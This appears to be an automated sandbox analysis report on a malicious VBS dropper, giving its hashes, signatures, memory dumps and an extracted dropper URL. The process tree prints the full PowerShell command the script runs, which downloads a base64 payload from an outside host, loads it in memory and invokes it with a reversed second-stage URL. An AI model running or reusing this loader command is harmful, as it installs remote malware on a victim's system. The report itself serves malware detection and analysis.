Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 09:44

General

  • Target

    RVF002.vbs

  • Size

    236KB

  • MD5

    7b474b087d336f766ba4cd74067e2786

  • SHA1

    aac3de5ebd60465dabdd78033637819b68d1e91b

  • SHA256

    92d4a215bc6adc95dec27c087a23e307dcebd79b2abcbb76f9f9dc08a70b3e5a

  • SHA512

    e431562d6a08d91075c8498dd88de3c83a7e21bf627263254f3b62e9f9b5493a34f1f942412865e3bd4bc3bcfc4ff2c8f5223aa0fa58601803d1f43451f50dfe

  • SSDEEP

    24:QnODOUWlHllyjOMyE2aL8gVEuMvywFfV7N9Riwnwm43YQ7FYiVLneMDTFv9vPvWE:yKVWtl6OeqyYLQeMHNOSAgHyLKhB

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://schoolcrypter.com/dll_startup

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RVF002.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://schoolcrypter.com/dll_startup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('ad6c8d496523-a4ab-b6a4-dbc7-750db9b1=nekot&aidem=tla?txt.qT/o/moc.topsppa.0a726-dspok/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2340

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2340-4-0x000007FEF5F1E000-0x000007FEF5F1F000-memory.dmp

    Filesize

    4KB

  • memory/2340-5-0x000000001B780000-0x000000001BA62000-memory.dmp

    Filesize

    2.9MB

  • memory/2340-7-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

    Filesize

    32KB

  • memory/2340-6-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2340-8-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2340-9-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2340-10-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2340-11-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2340-12-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

    Filesize

    9.6MB